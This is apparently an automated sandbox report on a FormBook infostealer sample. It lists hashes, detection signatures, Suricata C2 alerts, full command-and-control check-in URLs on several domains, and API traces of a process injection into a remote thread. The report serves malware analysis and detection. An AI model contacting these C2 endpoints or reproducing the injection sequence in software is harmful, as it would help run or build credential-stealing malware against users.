Summary | ZeroBOX

prosperx.exe

Category FILE
Machine s1_win7_x6402
Started April 21, 2021, 10:06 a.m.
Completed April 21, 2021, 10:11 a.m.
Size 270.1KB
Type PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
MD5 7f3fc7d086447a7e15e0d32bdd885cbc
SHA256 ce2ca323cae4838375c60305a3706e6828ab9fd8e30b65b1d0f4c87dbce0f29b
CRC32 1A36F713
ssdeep 6144:2YYvBRynyzaKqaFYI0QhvDqNvP1U+tcbVBupu:uBRynrEFY47qNvNUOmsU
Yara
  • escalate_priv - Escalate privileges
  • screenshot - Take screenshot
  • win_registry - Affect system registries
  • win_token - Affect system token
  • win_private_profile - Affect private profile
  • win_files_operation - Affect private profile
  • PE_Header_Zero - PE File Signature Zero
  • IsPE32 - (no description)
  • IsWindowsGUI - (no description)
  • IsPacked - Entropy Check
  • HasOverlay - Overlay Check
  • HasRichSignature - Rich Signature Check

Suricata Alerts

Flow | SID | Signature | Category
TCP 192.168.56.102:49813 -> 166.62.108.196:80 | 2031412 | ET MALWARE FormBook CnC Checkin (GET) | Malware Command and Control Activity Detected
TCP 192.168.56.102:49813 -> 166.62.108.196:80 | 2031449 | ET MALWARE FormBook CnC Checkin (GET) | Malware Command and Control Activity Detected
TCP 192.168.56.102:49813 -> 166.62.108.196:80 | 2031453 | ET MALWARE FormBook CnC Checkin (GET) | Malware Command and Control Activity Detected
TCP 192.168.56.102:49814 -> 151.101.194.159:80 | 2031412 | ET MALWARE FormBook CnC Checkin (GET) | Malware Command and Control Activity Detected
TCP 192.168.56.102:49814 -> 151.101.194.159:80 | 2031449 | ET MALWARE FormBook CnC Checkin (GET) | Malware Command and Control Activity Detected
TCP 192.168.56.102:49814 -> 151.101.194.159:80 | 2031453 | ET MALWARE FormBook CnC Checkin (GET) | Malware Command and Control Activity Detected
TCP 192.168.56.102:49811 -> 34.102.136.180:80 | 2031412 | ET MALWARE FormBook CnC Checkin (GET) | Malware Command and Control Activity Detected
TCP 192.168.56.102:49811 -> 34.102.136.180:80 | 2031449 | ET MALWARE FormBook CnC Checkin (GET) | Malware Command and Control Activity Detected
TCP 192.168.56.102:49811 -> 34.102.136.180:80 | 2031453 | ET MALWARE FormBook CnC Checkin (GET) | Malware Command and Control Activity Detected

Suricata TLS

No Suricata TLS

Time & API Arguments Status Return Repeated

IsDebuggerPresent

0 0
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

1 1 0
section .ndata
suspicious_features GET method with no useragent header | suspicious_request GET http://www.milehighcitygames.com/xcl/?Tj=fTgN0Et6e/d09dZDxyMRrypPZrJHAeTvzEoww+MZoNOHJJv+5czzLYqto9iAljufQKJX/SVl&SX=dn98bVV0hxJ4
suspicious_features GET method with no useragent header | suspicious_request GET http://www.sophieberiault.com/xcl/?Tj=a/FLMe0ya/9YtTuUYok1B7vp/5Gr9at0LM/5wBD76A+xTQCdjVAZGPVTPrI0zw+67MuX3Fmg&SX=dn98bVV0hxJ4
suspicious_features GET method with no useragent header | suspicious_request GET http://www.topgradetutors.net/xcl/?Tj=Iac5W1wUqDosYJk6LxlBM2b783u0YGGNexhKQMJrvkzTaDAxSdLOMJq38mi9FvZlS0tSXUVd&SX=dn98bVV0hxJ4
request GET http://www.milehighcitygames.com/xcl/?Tj=fTgN0Et6e/d09dZDxyMRrypPZrJHAeTvzEoww+MZoNOHJJv+5czzLYqto9iAljufQKJX/SVl&SX=dn98bVV0hxJ4
request GET http://www.sophieberiault.com/xcl/?Tj=a/FLMe0ya/9YtTuUYok1B7vp/5Gr9at0LM/5wBD76A+xTQCdjVAZGPVTPrI0zw+67MuX3Fmg&SX=dn98bVV0hxJ4
request GET http://www.topgradetutors.net/xcl/?Tj=Iac5W1wUqDosYJk6LxlBM2b783u0YGGNexhKQMJrvkzTaDAxSdLOMJq38mi9FvZlS0tSXUVd&SX=dn98bVV0hxJ4
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

process_identifier: 2864
region_size: 1310720
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02c70000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2864
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02d70000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2864
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02d71000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 3172
region_size: 3158016
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00920000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffff
1 0 0
file C:\Users\test22\AppData\Local\Temp\nsj63.tmp\8yuqrvh.dll
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0
host 172.217.25.14
Process injection Process 2864 called NtSetContextThread to modify thread in remote process 3172
Time & API Arguments Status Return Repeated

NtSetContextThread

registers.eip: 2000355780
registers.esp: 1638384
registers.edi: 0
registers.eax: 4320112
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
thread_handle: 0x000001fc
process_identifier: 3172
1 0 0
Bkav W32.AIDetect.malware1
Elastic malicious (high confidence)
McAfee Artemis!7F3FC7D08644
Cylance Unsafe
K7AntiVirus Trojan ( 005772cf1 )
K7GW Trojan ( 005772cf1 )
Cybereason malicious.8a776b
Symantec ML.Attribute.HighConfidence
APEX Malicious
Kaspersky VHO:Trojan-Spy.Win32.Noon.gen
NANO-Antivirus Trojan.Win32.Androm.ikbioz
Sophos Generic ML PUA (PUA)
McAfee-GW-Edition BehavesLike.Win32.Vopak.dc
FireEye Generic.mg.7f3fc7d086447a7e
SentinelOne Static AI - Malicious PE
Avira HEUR/AGEN.1140854
Gridinsoft Adware.Win32.Linkury.oa!s1
Cynet Malicious (score: 100)
AhnLab-V3 Malware/Gen.RL_Reputation.R364385
Ikarus Trojan.NSIS.Agent
Fortinet NSIS/Injector.EOYT!tr
CrowdStrike win/malicious_confidence_80% (D)
dead_host 103.101.188.123:80